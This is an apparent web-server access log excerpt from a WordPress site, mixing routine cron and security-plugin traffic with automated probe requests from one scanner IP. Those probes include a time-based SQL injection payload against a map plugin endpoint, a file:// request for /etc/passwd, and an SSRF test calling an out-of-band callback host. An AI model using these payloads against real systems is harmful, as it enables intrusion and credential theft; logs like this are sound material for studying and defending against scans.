165.232.54.158 - - [13/Jan/2026:22:36:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:22:36:56 +0800] "GET /wp-json/mapsvg/v1/maps/2?id=1%27%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)--+ HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:37:00 +0800] "GET /archive/download?file=file:///etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Debian; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:22:37:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768315028.0474500656127929687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:37:06 +0800] "POST /?wordfence_syncAttackData=1768315026.3615 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:37:04 +0800] "GET /archive/download?file=http://d5iu610i9qj8svou82p0r6sj4zf3hrg9j.oast.fun/ HTTP/1.1" 404 10860 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [13/Jan/2026:22:37:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768315038.9051671028137207031250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
18.118.108.129 - - [13/Jan/2026:22:37:15 +0800] "POST /wp-login.php HTTP/1.1" 503 7314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
165.232.54.158 - - [13/Jan/2026:22:38:13 +0800] "GET /user/login HTTP/1.1" 500 1004 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:38:53 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:38:55 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/122.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:40:48 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
